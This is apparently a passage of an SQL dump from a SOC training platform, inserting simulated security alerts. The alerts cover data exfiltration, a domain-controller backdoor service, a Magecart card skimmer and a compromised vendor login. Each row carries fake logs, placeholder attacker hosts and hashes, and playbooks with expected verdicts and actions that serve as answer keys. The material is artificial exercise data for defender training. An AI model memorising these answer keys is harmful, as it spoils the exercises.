2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:36Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"file_name\\\":\\\"credentials_dump.txt\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_name\\\":\\\"APT29_Infostealer\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(454, 'Persistence Mechanism Installation on Domain Controller', 'high', 'Host Intrusion Detection System (HIDS)', 'The attacker installed a backdoor on the domain controller to ensure long-term access. A suspicious service named \'WinSvcHelper\' was created and linked to a known malicious executable \'svcbackdoor.exe\'.', 'Persistence', 'T1543.003 - Create or Modify System Process: Windows Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:32Z\",\"event_id\":\"4624\",\"host\":\"dc01.corp.local\",\"user\":\"Administrator\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.1.1.5\",\"service_name\":\"WinSvcHelper\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svcbackdoor.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"event_description\":\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\"}', '2026-01-05 00:02:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised domain controller.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"svcbackdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with persistence techniques used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in multiple malware 
analysis engines.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. 
The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. 
The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:32Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"host\\\":\\\"dc01.corp.local\\\",\\\"user\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.1.5\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"event_description\\\":\\\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(455, 'Initial Compromise via Third-Party Library', 'high', 'Web Application Firewall (WAF) Logs', 'An intrusion was detected via a compromised third-party advertising library. The library, affected by Magecart, injects malicious JavaScript into checkout pages to exfiltrate sensitive information.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"http_request\":\"GET /ad-library.js HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"referrer\":\"https://example-store.com/checkout\",\"malicious_script_hash\":\"6f1e3b2b4c3e8a2f7f5d5c9b8a8f7d6e\",\"filename\":\"ad-library.js\",\"detected_by\":\"WAF\",\"alert_id\":\"waf-alert-20231015-0001\"}', '2026-01-05 00:07:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Magecart attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"6f1e3b2b4c3e8a2f7f5d5c9b8a8f7d6e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Magecart-injected scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ad-library.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Filename is part of third-party library.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(456, 'Execution of Obfuscated JavaScript', 'high', 'JavaScript Console Logs', 'Obfuscated JavaScript code executed on the checkout page to skim credit card details and transmit them to an attacker-controlled server.', 'Code Injection', 'T1059.007', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:54Z\",\"event_id\":\"js_exec_001\",\"script_url\":\"http://malicious-domain.com/skimmer.js\",\"executed_by_ip\":\"192.168.1.101\",\"exfiltration_url\":\"http://attacker-site.com/cc_capture\",\"attacker_ip\":\"203.0.113.45\",\"script_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"filename\":\"skimmer.js\"}', '2026-01-05 00:07:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/skimmer.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known credit card skimming attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with obfuscated JavaScript malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:54Z\\\",\\\"event_id\\\":\\\"js_exec_001\\\",\\\"script_url\\\":\\\"http://malicious-domain.com/skimmer.js\\\",\\\"executed_by_ip\\\":\\\"192.168.1.101\\\",\\\"exfiltration_url\\\":\\\"http://attacker-site.com/cc_capture\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"script_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"filename\\\":\\\"skimmer.js\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(457, 'Data Exfiltration to Drop Server', 'high', 'Network Traffic Analysis', 'The network traffic analysis has detected an unauthorized data transfer from the compromised internal server to an external drop server associated with Magecart. The data transferred includes payment information extracted from the internal server. The traffic was observed from internal IP 192.168.10.15 to external IP 203.0.113.45, with the data being exported in a compressed file named \'payments_exfil.zip\'. The hash of the exfiltrated file is 9e107d9d372bb6826bd81d3542a419d6.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"payments_exfil.zip\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"user\":\"websrv_user\",\"action\":\"transfer\",\"status\":\"completed\"}', '2026-01-05 00:07:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"External IP associated with Magecart drop servers.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payments_exfil.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename used for exfiltrated payment data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltrated data 
files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(458, 'Suspicious Vendor Login Detected', 'high', 'SIEM Logs', 'A successful login using compromised credentials belonging to a trusted vendor account was detected. The attacker used these credentials to gain initial access to the retail giant\'s POS network.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:20:30Z\",\"event_id\":\"4567\",\"event_type\":\"login_attempt\",\"username\":\"vendor_john_doe\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"login_status\":\"success\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"network_domain\":\"pos_network\",\"hash\":\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\",\"file_name\":\"pos_access_script.exe\"}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"vendor_john_doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"The username is associated with a trusted vendor but was used from an unusual location.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"The IP address is linked to multiple unauthorized access attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"The hash corresponds to a known malware used in recent attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"pos_access_script.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"The filename is consistent with scripts used in previous 
breaches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 
Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.068Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:20:30Z\\\",\\\"event_id\\\":\\\"4567\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"username\\\":\\\"vendor_john_doe\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"login_status\\\":\\\"success\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"network_domain\\\":\\\"pos_network\\\",\\\"hash\\\":\\\"3b3e8f557c3c4e3b2e8e9f0b8b4e9f5d\\\",\\\"file_name\\\":\\\"pos_access_script.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
